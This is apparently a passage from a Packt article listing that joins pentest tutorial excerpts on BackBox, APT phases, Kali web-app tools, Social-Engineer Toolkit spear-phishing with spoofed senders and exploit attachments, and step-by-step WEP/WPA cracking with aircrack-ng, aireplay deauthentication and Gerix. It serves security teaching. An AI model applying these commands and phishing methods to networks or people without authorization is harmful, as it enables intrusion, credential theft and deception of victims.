next step will be to analyze that information and its evaluation. Vulnerability Assessment is the process of identifying the vulnerabilities present in the system and prioritizing them. Exploitation Exploitation is the process where the weakness or bug in the software is used to penetrate the system. This can be done through the usage of an exploit, which is nothing but an automated script that is designed to perform a malicious attack on target systems. Privilege Escalation Privilege Escalation occurs when we have already gained access to the system but with low privileges. It can also be that we have legitimate access but not enough to make effective changes on the system, so we will need to elevate our privileges or gain access to another account with higher privileges. Maintaining Access Maintaining Access is about setting up an environment that will allow us to access the system again without repeating the tasks that we performed to gain access initially. Documentation & Reporting The Documentation & Reporting menu contains the tools that will allow us to collect the information during our assessment and generate a human readable report from them. Reverse Engineering The Reverse Engineering menu contains the suite of tools aimed to reverse the system by analyzing its structure for both hardware and software. Social Engineering Social Engineering is based on a nontechnical intrusion method, mainly on human interaction. It is the ability to manipulate the person and obtain his/her access credentials or the information that can introduce us to such parameters. Stress Testing The Stress Testing menu contains a group of tools aimed to test the stress level of applications and servers. Stress testing is the action where a massive amount of requests (for example, ICMP request) are performed against the target machine to create heavy traffic to overload the system. In this case, the target server is under severe stress and can be taken advantage of. For instance, the running services such as the web server, database or application server (for example, DDoS attack) can be taken down. Forensic Analysis The Forensic Analysis menu contains a great amount of useful tools to perform a forensic analysis on any system. Forensic analysis is the act of carrying out an investigation to obtain evidence from devices. It is a structured examination that aims to rebuild the user's history in a computer device or a server system. VoIP Analysis The voice over IP (VoIP) is a very commonly used protocol today in every part of the world. VoIP analysis is the act of monitoring and analyzing the network traffic with a specific analysis of VoIP calls. So in this section, we have a single tool dedicated to the analysis of VoIP systems. Wireless Analysis The Wireless Analysis menu contains a suite of tools dedicated to the security analysis of wireless protocols. Wireless analysis is the act of analyzing wireless devices to check their safety level. Miscellaneous The Miscellaneous menu contains tools that have different functionalities and can be placed in any section that we mentioned earlier, or in none of them. Services Apart from the Auditing menu, BackBox also has a Services menu. This menu is designed to populate the daemons of the tools, those which need to be manually initialized as a service. Update We have the Update menu that can be found in the main menu, just next to the Services menu. The Update menu contains the automated scripts to allow the users to update the tools that are out of APT automated system. Anonymous BackBox 3.13 has a new menu voice called Anonymous in the main menu. This menu contains a script that makes the user invisible to the network once started. The script populates a set of tools that anonymize the system while navigating, and connects to the global network, Internet. Extras Apart from the security-auditing tools, BackBox also has several privacy-protection tools. The suite of privacy-protection tools includes Tor, Polipo, and the Firefox safe mode that have been configured with a default profile in the private-browsing mode. There are many other useful tools recommended by the team but they are not included in the default ISO image. Therefore, the recommended tools are available in the BackBox repository and can be easily installed with apt-get (automated package installation tool for Debian-like systems). Completeness, accuracy, and support It is obvious that there are many alternatives when it comes to the choice of penetration testing tools for any particular auditing process. The BackBox team is mainly focused on the size of the tool library, performance, and the inclusion of the tools for security and auditing. The amount of tools included in BackBox is subject to accurate selection and testing by a team. Most of the security and penetration testing tools are implemented to perform identical functions. The BackBox team is very careful in the selection process in order to avoid duplicate applications and redundancies. Besides the wiki-based documentation provided for its set of tools, the repository of BackBox can also be imported into any of existing Ubuntu installation (or any of Debian derivative distro) by simply importing the project's Launchpad repository to the source list. Another point that the BackBox team focus their attention on is the size issue. BackBox may not offer the largest number of tools and utilities, but numbers are not equal to the quality. It has the essential tools installed by default that are sufficient to a penetration tester. However, BackBox is not a perfect penetration testing distribution. It is a very young project and aims to offer the best solution to the global community. Links and contacts BackBox is an open community where everybody's help is greatly welcomed. Here is a list of useful links to BackBox information on the Web: The BackBox main and official web page, where we can find general information about the distribution and the organization of the team, is available at http://www.BackBox.org/ The BackBox official blog, where we can find news about BackBox such as release notes and bug correction notifications, is available at http://www.BackBox.org/blog The BackBox official wikipage, where we can find many tutorials for the tools usage that are included in the distribution, is available at http://wiki.BackBox.org/ The BackBox official forum is the main discussion forum, where users can post their problems and also suggestions, is available at http://forum.BackBox.org/ The BackBox official IRC chat room is available at https://kiwiirc.com/client/irc.autistici.org:6667/?nick=BackBox_?#BackBox The BackBox official repository hosted on Launchpad, where the entire packages are located, is available at https://launchpad.net/~BackBox BackBox has also a Wikipedia page, where we can run through a brief history about how the project began, which is available at http://en.wikipedia.org/wiki/BackBox Summary In this article, we became more familiar with the BackBox environment by analyzing its menu structure and the way its tools are organized. We also provided a quick comment on each tool in BackBox. This is the only theoretical information regarding the introduction of BackBox. Resources for Article: Further resources on this subject: Penetration Testing and Setup [article] BackTrack 4: Security with Penetration Testing Methodology [article] Web app penetration testing in Kali [article]
Read more
  • 0
  • 0
  • 9593

article-image-social-engineering-attacks
Packt
23 Dec 2013
6 min read
Save for later

Social Engineering Attacks

Packt
23 Dec 2013
6 min read
(For more resources related to this topic, see here.) Advanced Persistent Threats Advanced Persistent Threats came into existence during cyber espionage between nations. The main motive for these attacks was monetary gain and lucrative information. APTs normally target specific organization. A targeted attack is the prerequisite for APT. The targeted attack commonly exploits vulnerability of the application on the target. The attacker normally crafts a mail with malicious attachment, such as any PDF document or an executable, which is e-mailed to the individual or group of individuals .Generally, these e-mails are prepared with some social engineering element to make it lucrative to the target. The typical characteristics of APTs are as follows: Reconnaissance: The attacker motivates to get to know the target and their environment, specific users, system configurations, and so on. This type of information can be obtained from the metadata tool collector from the targeted organization document, which can be easily collected from the target organization website by using tools such as FOCA, metagoofil, libextractor, and CeWL. Time-to-live: In APTs, attackers utilize the techniques to bypass security and deploy a backdoor to make the access for longer period of time and placing a backdoor so they can always come back in case their actual presence was detected. Advance malware: Attacker utilizes the polymorphic malware in the APT. The polymorphic generally changes throughout its cycle to fool AV detection mechanism. Phishing: Most APT exploiting the target machine application is started by social engineering and spear phishing. Once the target machine is compromised or network credentials are given up, the attackers actively take steps to deploy their own tools to monitor and spread through the network as required, from machine-to-machine, and network-to-network, until they find the information they are looking for. Active Attack: In APT, there is a human element involvement. Everything is not an automatic malicious code. Famous attacks classified under APTs are as follows: Operation Aurora McRAT Hydraq Stuxnet RSA SecureID attacks The APT life cycle covers five phases, which are as follows: Phase 1: Reconnaissance Phase 2: Initial exploitation Phase 3: Establish presence and control Phase 4: Privilege escalation Phase 5: Data extraction Phase 1: Reconnaissance It's a well-known saying, "A war is half won by not only on our strength but also how much we know our enemy". The attacker generally gathers information from variety of sources as initial preparation so definitely it applies to the defendant. Information on specific people mostly higher management people who posses important information, information about specific events, setting up initial attack point and application vulnerability. So there are multiple places such as Facebook, LinkedIn, Google, and many more where the attacker tries to find the information. There are tools that generally assist Social Engineering Framework (SEF) that we have included in the book, Kali Linux Social Engineering, and another one that I suggest is Foca Meta data collector. An attack would be planned based on the information gathering. So employee awareness program must be continuously run to make employees aware that they should not to highlight themselves on the Internet and should be better prepared to defend against these attack. Phase 2: Initial exploitation A spear-phishing attack is considered one of the most advanced targeting attacks, and they are also called advance persistent threat (APT) attacks. Today, many cyber criminals use spear phishing attack to initial exploit the machine. The objective of performing spear-phishing is to gain long term access to different resources of the target for ex-government, military network, or satellite usage. The main motivation of performing such attacks is to gain access to IT environment and utilize zero day exploit found in initial information gathering phase. Why this attack is considered most dangerous because the attacker can spoof its e-mail ID by sending a malicious e-mail. There is a complete example in graphical format implementation of this has been included in the book Kali Linux Social Engineering. Phase 3: Establishing presence and control The main objective of this stage is to deploy full range of attack tools such as backdoor and rootkits to start controlling the environment and stay undetected. The organization need to take care of the outbound connection to deter such attacks because the attack tools make the outbound connection to attacker. Phase 4: Privilege escalation This is one of the key phase in the APT. Once the attacker has breached the network, the next step is to take over the privilege accounts to move the around the targeted network. So the common objective of the attacker is to obtain an administrator level credentials and stay undetected. The best approach to defend against these attacks "assume that the attackers are inside our networks right now and proceed accordingly by blocking the pathways they're travelling to access and steal our sensitive data. Phase 5: Data extraction This is the stage where the attacker has control over one or two machine in the targeted network and have obtained access credentials to supervise it's reach and identified the lucrative data. The only objective left for the attacker to start sending the data from targeted network to one of its own server or on his own machine The attacker has number of option what he can do with this data. The attacker can ask for ransom if the target does not agree to pay the amount, he can threaten to disclose the information in the public, share the zero day exploits, sell the information, or public disclosure. APT defense The defense against the APT attacks mostly based on its characteristics. The APT attacks normally bypass the Network Firewall Defense by attaching exploits within the content carried over the allowed protocol .So deep content filtering is required. In most of the APT attacks custom-developed code or targeting zero day vulnerability is used so no single IPS or antivirus signature will be able to identify the threat so must reply on less definitive indicators. The organization must ask himself what they are trying to protect and perhaps they can apply layer of data loss prevention (DEP) technology. The organization needs to monitor both inbound or outbound network preferably for both web and e-mail communication. Summary In this article, we learned what are APTs and the types of APTs. Resources for Article: Further resources on this subject: Web app penetration testing in Kali [Article] Debugging Sikuli scripts [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 2000
article-image-web-app-penetration-testing-kali
Packt
30 Oct 2013
4 min read
Save for later

Web app penetration testing in Kali

Packt
30 Oct 2013
4 min read
(For more resources related to this topic, see here.) Web apps are now a major part of today's World Wide Web. Keeping them safe and secure is the prime focus of webmasters. Building web apps from scratch can be a tedious task, and there can be small bugs in the code that can lead to a security breach. This is where web apps jump in and help you secure your application. Web app penetration testing can be implemented at various fronts such as the frontend interface, database, and web server. Let us leverage the power of some of the important tools of Kali that can be helpful during web app penetration testing. WebScarab proxy WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review and modify the requests created by the browser before they are sent to the server. Similarly, the responses received from the server can be modified before they are reflected in the browser. The new version of WebScarab has many more advanced features such as XSS/CSRF detection, Session ID analysis, and Fuzzing. Follow these three steps to get started with WebScarab: To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web application proxies | WebScarab. Once the application is loaded, you will have to change your browser's network settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008: Save the settings and go back to the WebScarab GUI. Click on the Proxy tab and check Intercept request. Make sure that both GET and POST requests are highlighted on the left-hand side panel. To intercept the response, check Intercept responses to begin reviewing the responses coming from the server. Attacking the database using sqlninja sqlninja is a popular tool used to test SQL injection vulnerabilities in Microsoft SQL servers. Databases are an integral part of web apps hence, even a single flaw in it can lead to mass compromising of information. Let us see how sqlninja can be used for database penetration testing. To launch SQL ninja, browse to Applications | Kali Linux | Web applications | Database Exploitation | sqlninja. This will launch the terminal window with sqlninja parameters. The important parameter to look for is either the mode parameter or the –m parameter: The –m parameter specifies the type of operation we want to perform over the target database.Let us pass a basic command and analyze the output: root@kali:~#sqlninja –m test Sqlninja rel. 0.2.3-r1 Copyright (C) 2006-2008 icesurfer [-] sqlninja.conf does not exist. You want to create it now ? [y/n] This will prompt you to set up your configuration file (sqlninja.conf). You can pass the respective values and create the config file. Once you are through with it, you are ready to perform database penetration testing. The Websploit framework Websploit is an open source framework designed for vulnerability analysis and penetration testing of web applications. It is very much similar to Metasploit and incorporates many of its plugins to add functionalities. To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application Fuzzers | Websploit. We can begin by updating the framework. Passing the update command at the terminal will begin the updating process as follows: wsf>update [*]Updating Websploit framework, Please Wait… Once the update is over, you can check out the available modules by passing the following command: wsf>show modules Let us launch a simple directory scanner module against www.target.com as follows: wsf>use web/dir_scanner wsf:Dir_Scanner>show options wsf:Dir_Scanner>set TARGET www.target.com wsf:Dir_Scanner>run Once the run command is executed, Websploit will launch the attack module and display the result. Similarly, we can use other modules based on the requirements of our scenarios. Summary In this article, we covered the following sections: WebScarab proxy Attacking the database using sqlninja The Websploit framework Resources for Article: Further resources on this subject: Installing VirtualBox on Linux [Article] Linux Shell Script: Tips and Tricks [Article] Installing Arch Linux using the official ISO [Article]
Read more
  • 0
  • 0
  • 6990

article-image-social-engineer-toolkit
Packt
25 Oct 2013
11 min read
Save for later

Social-Engineer Toolkit

Packt
25 Oct 2013
11 min read
(For more resources related to this topic, see here.) Social engineering is an act of manipulating people to perform actions that they don't intend to do. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or some malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing unintentional malicious activity. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario where the victim can be tricked to reveal his/her login information by sending a fake login/phishing page. The Social-Engineer Toolkit is designed to perform such tricking activities. Just like we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze the aspect of this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering. Getting started with the Social-Engineer Toolkit (SET) Let's start our introductory recipe about SET, where we will be discussing SET on different platforms. Getting ready SET can be downloaded for different platforms from its official website: https://www.trustedsec.com/. It has both the GUI version, which runs through the browser, and the command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article. How to do it... To launch SET on BackTrack, start the terminal window and pass the following path: root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set Copyright 2012, The Social-Engineer Toolkit (SET) All rights reserved. Select from the menu: If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use. The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit. How it works... SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools, such as SET. It also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET. Apache is typically considered the preferable server while working with SET. There's more... Sometimes, you may have an issue upgrading to the new release of SET in BackTrack 5 R3. Try out the following steps: You should remove the old SET using the following command: dpkg –r set We can remove SET in two ways. First, we can trace the path to /pentest/exploits/set, making sure we are in the directory and then opt for the 'rm' command for removing all files present there. Or, we can use the method shown previously. Then, for reinstallation, we can download its clone using the following command: Git clone https://github.com/trustedsec/social-engineer-toolkit /set Working with the SET config file In this recipe, we will take a close look at the SET config file, which contains default values for different parameters that are used by the toolkit. The default configuration works fine with most of the attacks, but there can be situations when you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file. Getting ready To launch the config file, move to the config file and open the set_config file: root@bt:/pentest/exploits/set# nano config/set_config The configuration file will be launched with some introductory statements, as shown in the following screenshot: How to do it... Let's go through it step-by-step: First, we will see what configuration settings are available for us: # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3 METASPLOIT_PATH=/pentest/exploits/framework3 The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as it picks up payloads and exploits from the framework: # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT # EXAMPLE: ETTERCAP_INTERFACE=wlan0 ETTERCAP_INTERFACE=eth0 # # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF) ETTERCAP_PATH=/usr/share/ettercap Ettercap is a multipurpose sniffer for switched LAN. Ettercap section can be used to perform LAN attacks like DNS poisoning, spoofing etc. The above SET setting can be used to either set ettercap ON of OFF depending upon the usability. # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES SENDMAIL=OFF The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF. The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack: # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO # INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk SELF_SIGNED_APPLET=OFF We will discuss this attack vector in detail in a later recipe, that is, the Spear phishing attack vector . This attack vector will also require JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail: SELF_SIGNED_APPLET=ON # AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT # SET TO AUTODETECT YOUR INTERFACE AUTO_DETECT=ON The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using NAT/Port forwarding, and it allows you to connect to the external Internet. The following setting is used to set up the Apache web server to perform web-based attack vectors. It is always preferred to set it to ON for better attack performance: # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF # THE ATTACK VECTOR APACHE_SERVER=OFF # # PATH TO THE APACHE WEBROOT APACHE_DIRECTORY=/var/www The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET. So, it is recommended to keep this flag OFF: # TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF The following setting can be used to build a self-signed certificate for web attacks, but there will be a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user: # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! # SELF_SIGNED_CERT=OFF The following setting is used to enable or disable the Metasploit listener once the attack is executed: # DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND. AUTOMATIC_LISTENER=ON The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase the penetration testing performance: # THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS # OR THE OTHER ATTACK VECTORS. METASPLOIT_MODE=ON These are a few important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over the SET. How it works... The SET config file is the heart of the toolkit, as it contains the default values that SET will pick while performing various attack vectors. A misconfigured SET file can lead to errors during the operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file. Working with the spear-phishing attack vector A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to target/specific user(s). In order to spoof your own e-mail address, you will require a sendmail server. Change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, then it can be downloaded by entering the following command: root@bt:~# apt-get install sendmail Reading package lists... Done Getting ready Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works. Recipient e-mail servers, in order to mitigate these types of attacks, deploy gray-listing, SPF records validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain. For example, if a spoofed e-mail address, <richyrich@gmail.com>, arrives from the IP 202.145.34.23, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in the RBL/SURL list. As the spear-phishing attack relies heavily on user perception, the attacker should conduct a recon of the content that is being sent and should ensure that the content looks as legitimate as possible. Spear-phishing attacks are of two types—web-based content and payload-based content. How to do it... The spear-phishing module has three different attack vectors at our disposal: Let's analyze each of them. Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options will include setting the vnc server or executing the payload and starting the command line, and so on. The next few steps will be starting the sendmail server, setting a template for a malicious file format, and selecting a single or mass-mail attack: Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server: 1. Use a gmail Account for your email attack. 2. Use your own server or open relay set:phishing>1 set:phishing> From address (ex: moo@example.com):bigmoney@gmail.com set:phishing> Flag this message/s as high priority? [yes|no]:y Setting up your own server cannot be very reliable, as most of the mail services follow a reverse lookup to make sure that the e-mail has generated from the same domain name as the address name. Let's analyze another attack vector of spear-fishing. Creating a file format payload is another attack vector in which we can generate a file format with a known vulnerability and send it via e-mail to attack our target. It is preferred to use MS Word-based vulnerabilities, as they are difficult to detect whether they are malicious or not, so they can be sent as an attachment via an e-mail: set:phishing> Setup a listener [yes|no]:y [-] *** [-] * WARNING: Database support has been disabled [-] *** At last, we will be prompted on whether we want to set up a listener or not. The Metasploit listener will begin and we will wait for the user to open the malicious file and connect back to the attacking system. The success of e-mail attacks depends on the e-mail client that we are targeting. So, a proper analysis of this attack vector is essential. How it works... As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail will contain a malicious attachment, which will exploit a known vulnerability on the target machine and provide a shell connectivity to the attacker. The SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
Read more
  • 0
  • 0
  • 8939

article-image-wireless-attacks-kali-linux
Packt
11 Oct 2013
13 min read
Save for later

Wireless Attacks in Kali Linux

Packt
11 Oct 2013
13 min read
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about the various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of having to plug into an Ethernet cable to gain Internet access is not feasible. For this convenience, there is a price to be paid; wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic including mobile phones and wireless networks. We will cover the following topics in this article: Wireless network WEP cracking Wireless network WPA/WPA2 cracking Automating wireless network cracking Accessing clients using a fake AP URL traffic manipulation Port redirection Sniffing network traffic (For more resources related to this topic, see here.) Wireless network WEP cracking Wireless Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption and we will explore one of those ways in this recipe. In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key. Getting ready In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required. In case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. Please ensure your wireless card allows for packet injection as this is not something that all wireless cards support. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WEP. Open a terminal window and bring up a list of wireless network interfaces: airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step. airmon-ng stop ifconfig wlan0 down Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55. macchanger --mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right click your mouse, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface] aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0 Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface] aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0 Your screen will begin to fill with traffic. Let this process run for a minute or two until we have information to run the crack. Finally, we run AirCrack to crack the WEP key. aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP encrypted key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password. Wireless network WPA/WPA2 cracking WiFi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack NG as it's commonly referred) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key. Getting ready In order to perform the tasks of this recipe, experience with the Kali Linux terminal windows is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WPA. Open a terminal window and bring up a list of wireless network interfaces. airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down. airmon-ng stop wlan0 ifconfig wlan0 down Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55. macchanger -–mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments. Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0 Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case,the file's name is wirelessattack.cap. Aircrack-ng –w ./wordlist.lst wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords against the gathered data until a successful handshake is established. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump . Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute forced the generated CAP file in order to get the wireless password. Automating wireless network cracking In this recipe we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. How to do it... Let's begin the process of performing an automated wireless network crack with Gerix by downloading it. Using wget, navigate to the following website to download Gerix. wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar Once the file has been downloaded, we now need to extract the data from the RAR file. unrar x gerix-wifi-cracker-master.rar Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools. mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker Let's navigate to the directory where Gerix is located. cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the WEP tab. Under Functionalities, click on the Start Sniffing and Logging button. Click on the subtab WEP Attacks (No Client). Click on the Start false access point authentication on victim button. Click on the Start the ChopChop attack button. In the terminal window that opens, answer Y to the Use this packet question. Once completed, copy the .cap file generated. Click on the Create the ARP packet to be injected on the victim access point button. Click on the Inject the created packet on victim access point button. In the terminal window that opens, answer Y to the Use this packet question. Once you have gathered approximately 20,000 packets, click on the Cracking tab. Click on the Aircrack-ng – Decrypt WEP Password button. That's it! How it works... In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitoring mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we then used Chop Chop to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forced the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP secured network. Accessing clients using a fake AP In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI 